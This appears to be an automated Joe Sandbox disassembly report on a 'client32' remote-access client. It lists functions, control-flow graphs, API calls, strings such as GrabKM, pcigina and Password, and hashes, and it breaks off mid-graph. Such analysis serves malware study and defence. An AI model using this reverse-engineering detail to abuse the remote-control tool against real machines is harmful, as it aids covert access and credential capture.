                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                                                                                • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                                                                • API String ID: 1609618855-357498123
                                                                                                                                                                • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                                                                                                • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                                                                                                • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                                                                                                • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52
                                                                                                                                                                Function 11086700 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2422 11086700-1108671d call 110866f0 2425 1108671f-1108672f call 11161d01 2422->2425 2426 11086730-11086740 call 11144bd0 2422->2426 2431 11086742-1108674a 2426->2431 2431->2431 2432 1108674c-11086752 2431->2432 2433 11086753-11086759 2432->2433 2433->2433 2434 1108675b-11086792 LoadLibraryA 2433->2434 2435 110867f9-1108680e GetProcAddress 2434->2435 2436 11086794-1108679b 2434->2436 2437 1108689c-110868ad call 11161d01 2435->2437 2438 11086814-11086823 GetProcAddress 2435->2438 2439 1108679d-110867ee GetModuleFileNameA call 11081b40 LoadLibraryA 2436->2439 2440 110867f0-110867f3 2436->2440 2438->2437 2441 11086825-11086834 GetProcAddress 2438->2441 2439->2440 2440->2435 2440->2437 2441->2437 2444 11086836-11086845 GetProcAddress 2441->2444 2444->2437 2447 11086847-11086856 GetProcAddress 2444->2447 2447->2437 2448 11086858-11086867 GetProcAddress 2447->2448 2448->2437 2449 11086869-11086878 GetProcAddress 2448->2449 2449->2437 2450 1108687a-11086889 GetProcAddress 2449->2450 2450->2437 2451 1108688b-1108689a GetProcAddress 2450->2451 2451->2437 2452 110868ae-110868c3 call 11161d01 2451->2452
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                                                                                • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                                                                                • API String ID: 2201880244-3035937465
                                                                                                                                                                • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                                                                                                • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                                                                                                • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                                                                                                • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50
                                                                                                                                                                Function 11141890 Relevance: 35.7, APIs: 3, Strings: 17, Instructions: 672registryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2455 11141890-111418c6 2456 111418cf-111418e4 call 1110f420 2455->2456 2457 111418c8-111418ca 2455->2457 2463 111418e6-1114190e call 11060f70 2456->2463 2464 11141910-11141912 2456->2464 2459 111421f2-1114220d call 11161d01 2457->2459 2466 11141918-11141947 call 11061700 2463->2466 2464->2466 2471 11141950-1114195d call 11142e50 2466->2471 2472 11141949-1114194a RegCloseKey 2466->2472 2475 11141964-11141985 call 11144dc0 call 11143230 2471->2475 2476 1114195f 2471->2476 2472->2471 2481 11141997-111419ad call 1110f420 2475->2481 2482 11141987-11141992 call 11062d60 2475->2482 2476->2475 2486 111419c2 2481->2486 2487 111419af-111419c0 call 11060be0 2481->2487 2482->2481 2489 111419c8-111419e2 call 1110f420 2486->2489 2487->2489 2493 111419e4-111419f5 call 11060be0 2489->2493 2494 111419f7 2489->2494 2496 111419fd-11141a17 call 1110f420 2493->2496 2494->2496 2500 11141a2c 2496->2500 2501 11141a19-11141a2a call 11060be0 2496->2501 2503 11141a32-11141a79 call 11060760 * 2 2500->2503 2501->2503 2509 11141a80 2503->2509 2510 11141a87-11141a8e 2509->2510 2511 11141a90-11141a97 2510->2511 2512 11141a9d-11141aa5 2510->2512 2511->2512 2513 11141d9a 2511->2513 2514 11141aa7-11141aad 2512->2514 2515 11141ac9-11141ad0 2512->2515 2516 11141da0-11141da2 2513->2516 2514->2515 2517 11141aaf-11141abc call 110607f0 2514->2517 2518 11141af5-11141b03 2515->2518 2519 11141ad2-11141ad9 2515->2519 2520 1114217f-11142187 2516->2520 2521 11141da8-11141df2 call 110d1550 call 1105dd10 2516->2521 2540 11141ac7 2517->2540 2541 11141abe-11141ac5 2517->2541 2522 11141b05-11141b07 2518->2522 2523 11141b0d-11141b0f 2518->2523 2519->2518 2525 11141adb-11141ae8 call 110607f0 2519->2525 2530 11142191-11142199 2520->2530 2531 11142189-1114218d 2520->2531 2572 11141f3d-11141f85 call 11060f40 call 1106b5c0 call 110679c0 2521->2572 2573 11141df8-11141e1f call 11060760 call 110607f0 2521->2573 2522->2513 2522->2523 2527 11141b11-11141b13 2523->2527 2528 11141b5d-11141b5f 2523->2528 2543 11141af3 2525->2543 2544 11141aea-11141af1 2525->2544 2538 11141b15-11141b1b 2527->2538 2539 11141b2f-11141b31 2527->2539 2533 11141b61-11141b66 2528->2533 2534 11141b68-11141b6a 2528->2534 2535 111421a3-111421ab 2530->2535 2536 1114219b-1114219f 2530->2536 2531->2530 2545 11141b8b-11141ba5 call 11081bb0 2533->2545 2546 11141b73-11141b89 call 11081bb0 2534->2546 2547 11141b6c-11141b71 2534->2547 2548 111421b5-111421f0 call 11060640 * 2 call 111618c1 2535->2548 2549 111421ad-111421b1 2535->2549 2536->2535 2538->2539 2550 11141b1d-11141b2a call 11146450 2538->2550 2551 11141d85-11141d98 call 11146450 2539->2551 2552 11141b37-11141b3e 2539->2552 2540->2515 2541->2515 2543->2518 2544->2518 2567 11141cac-11141ce9 call 1105de00 call 111319f0 2545->2567 2568 11141bab 2545->2568 2546->2545 2547->2545 2548->2459 2549->2548 2550->2509 2551->2516 2552->2551 2557 11141b44-11141b58 call 11146450 2552->2557 2557->2510 2598 11141cf1-11141cf8 2567->2598 2599 11141ceb 2567->2599 2574 11141bb5 2568->2574 2575 11141bad-11141baf 2568->2575 2625 11141f87 2572->2625 2626 11141fb3-11141fe8 EnterCriticalSection call 11060420 call 11060f40 2572->2626 2611 11141e21-11141e50 call 11146450 call 110607f0 2573->2611 2612 11141e52-11141e7a call 11060760 call 110607f0 2573->2612 2581 11141c3e-11141c7b call 1105de00 call 111319f0 2574->2581 2582 11141bbb-11141bc1 2574->2582 2575->2567 2575->2574 2614 11141c83-11141c8a 2581->2614 2615 11141c7d 2581->2615 2588 11141bc7-11141bcb 2582->2588 2594 11141be7-11141be9 2588->2594 2595 11141bcd-11141bcf 2588->2595 2597 11141bec-11141bee 2594->2597 2603 11141bd1-11141bd7 2595->2603 2604 11141be3-11141be5 2595->2604 2607 11141bf0-11141c2a call 1105de00 call 111319f0 2597->2607 2608 11141c32-11141c39 2597->2608 2609 11141d0a 2598->2609 2610 11141cfa-11141d08 2598->2610 2599->2598 2603->2594 2605 11141bd9-11141be1 2603->2605 2604->2597 2605->2588 2605->2604 2607->2608 2650 11141c2c 2607->2650 2619 11141d11 2608->2619 2609->2619 2610->2609 2610->2619 2611->2612 2647 11141eb1-11141ed8 call 11060760 call 110607f0 2612->2647 2648 11141e7c 2612->2648 2622 11141c9c 2614->2622 2623 11141c8c-11141c9a 2614->2623 2615->2614 2628 11141d18-11141d1a 2619->2628 2633 11141ca3-11141caa 2622->2633 2623->2622 2623->2633 2635 11141f90-11141f9e call 110508e0 2625->2635 2660 11141ffa-1114200c LeaveCriticalSection 2626->2660 2661 11141fea-11141ff7 call 1102a9f0 2626->2661 2630 11141d1c-11141d1e 2628->2630 2631 11141d3e-11141d56 call 11081c60 2628->2631 2630->2631 2638 11141d20-11141d38 call 11081bb0 2630->2638 2653 11141d58 2631->2653 2654 11141d5b-11141d73 call 11081c60 2631->2654 2633->2628 2656 11141fa0-11141fa1 2635->2656 2657 11141fa3 2635->2657 2638->2510 2638->2631 2680 11141f11-11141f38 call 11060640 * 3 2647->2680 2681 11141eda 2647->2681 2655 11141e80-11141eaf call 11146450 call 110607f0 2648->2655 2650->2608 2653->2654 2676 11141d75-11141d78 2654->2676 2677 11141d7d-11141d80 2654->2677 2655->2647 2664 11141fa4-11141fb1 call 110679c0 2656->2664 2657->2664 2667 11142051-1114209e call 11133400 call 110d1550 call 110cff20 2660->2667 2668 1114200e-11142010 2660->2668 2661->2660 2664->2626 2664->2635 2707 111420a4-111420c1 call 110d12e0 2667->2707 2708 1114214c-11142179 call 110d07c0 call 1106b620 call 110d07c0 2667->2708 2668->2667 2675 11142012-11142034 call 11146450 call 1113cc30 call 111414a0 2668->2675 2675->2667 2704 11142036-1114204e call 11146450 call 11026ba0 2675->2704 2676->2510 2677->2510 2680->2572 2685 11141ee0-11141f0f call 11146450 call 110607f0 2681->2685 2685->2680 2704->2667 2719 111420c3-111420d7 call 11029450 2707->2719 2720 111420da-111420f0 call 11081bb0 2707->2720 2708->2520 2719->2720 2727 111420f2-1114210a call 11009450 call 11081a70 2720->2727 2728 1114212b-11142145 2720->2728 2727->2728 2735 1114210c-11142129 call 11009450 2727->2735 2732 1114214a 2728->2732 2732->2708 2735->2732
                                                                                                                                                                APIs
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close
                                                                                                                                                                • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                • API String ID: 3535843008-2062829784
                                                                                                                                                                • Opcode ID: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
                                                                                                                                                                • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                                                                                                • Opcode Fuzzy Hash: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
                                                                                                                                                                • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51
                                                                                                                                                                Function 11074A00 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                                                                                                • _strncpy.LIBCMT ref: 11074B68
                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                                                                                                • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 11074D68
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CritiusernitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                                                                                                • API String ID: 703120326-1497550179
                                                                                                                                                                • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                                                                                                • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                                                                                                • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                                                                                                • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65
                                                                                                                                                                Function 11108D30 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 213libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                                                                                                • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                                                                                                  • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,776CC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                                                                                                  • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                                                                                                  • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                                                                                                  • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                                                                                                • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                                                                                                  • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                                                                                                  • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                                                                                                  • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                                                                                                  • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                                                                                                  • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                                                                                                • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                                                                                                • API String ID: 3930710499-403456261
                                                                                                                                                                • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                                                                                                • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                                                                                                • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                                                                                                • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11
                                                                                                                                                                Function 11138C30 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2862 11138c30-11138c47 2863 11139072-11139081 call 11161d01 2862->2863 2864 11138c4d-11138c54 2862->2864 2864->2863 2866 11138c5a-11138c61 2864->2866 2866->2863 2868 11138c67-11138c6e 2866->2868 2868->2863 2869 11138c74-11138c7b 2868->2869 2869->2863 2870 11138c81-11138c91 call 111450a0 2869->2870 2873 11138c93-11138c9a 2870->2873 2874 11138ca0-11138ce7 call 1105dd10 call 110637c0 2870->2874 2873->2863 2873->2874 2879 11138cf5-11138d1e call 1112c920 2874->2879 2880 11138ce9-11138cf0 2874->2880 2883 11138d24-11138d27 2879->2883 2884 11138dda call 110ea430 2879->2884 2880->2879 2886 11138d35 2883->2886 2887 11138d29-11138d2e 2883->2887 2888 11138ddf-11138de1 2884->2888 2890 11138d3b-11138d46 2886->2890 2887->2886 2889 11138d30-11138d33 2887->2889 2891 11138de3-11138dfe call 1105dd10 2888->2891 2892 11138e00-11138e0f PostMessageA 2888->2892 2889->2890 2893 11138d48 2890->2893 2894 11138d4d-11138d65 2890->2894 2891->2892 2896 11138e15-11138e1a 2891->2896 2892->2896 2893->2894 2901 11138dc1-11138dc8 2894->2901 2902 11138d67-11138d6d 2894->2902 2898 11138e25-11138e29 2896->2898 2899 11138e1c-11138e20 call 1110f270 2896->2899 2904 11138e2b-11138e33 2898->2904 2905 11138e4d-11138e76 call 11130410 call 11146ec0 call 1112cb20 call 111618c1 2898->2905 2899->2898 2909 11138dd7 2901->2909 2910 11138dca-11138dd1 call 11131a80 2901->2910 2906 11138d6f-11138d74 2902->2906 2907 11138dbc 2902->2907 2911 11138e35-11138e4b 2904->2911 2912 11138e79-11138e81 2904->2912 2905->2912 2906->2907 2913 11138d76-11138d7b 2906->2913 2907->2901 2909->2884 2910->2909 2927 11138dd3 2910->2927 2911->2912 2915 11138e83-11138e9d call 111618c1 call 11161d01 2912->2915 2916 11138e9e-11138ec4 call 11142e80 call 11146ee0 SetWindowTextA 2912->2916 2913->2907 2919 11138d7d-11138d9f 2913->2919 2936 11138ed0-11138ee9 call 111618c1 * 2 2916->2936 2937 11138ec6-11138ecd call 111352b0 2916->2937 2919->2907 2933 11138da1-11138db0 call 11145b40 2919->2933 2927->2909 2946 11138db2-11138dba 2933->2946 2949 11138eeb-11138eef 2936->2949 2950 11138f2e-11138f32 2936->2950 2937->2936 2946->2907 2946->2946 2953 11138f03-11138f0a 2949->2953 2954 11138ef1-11138f01 call 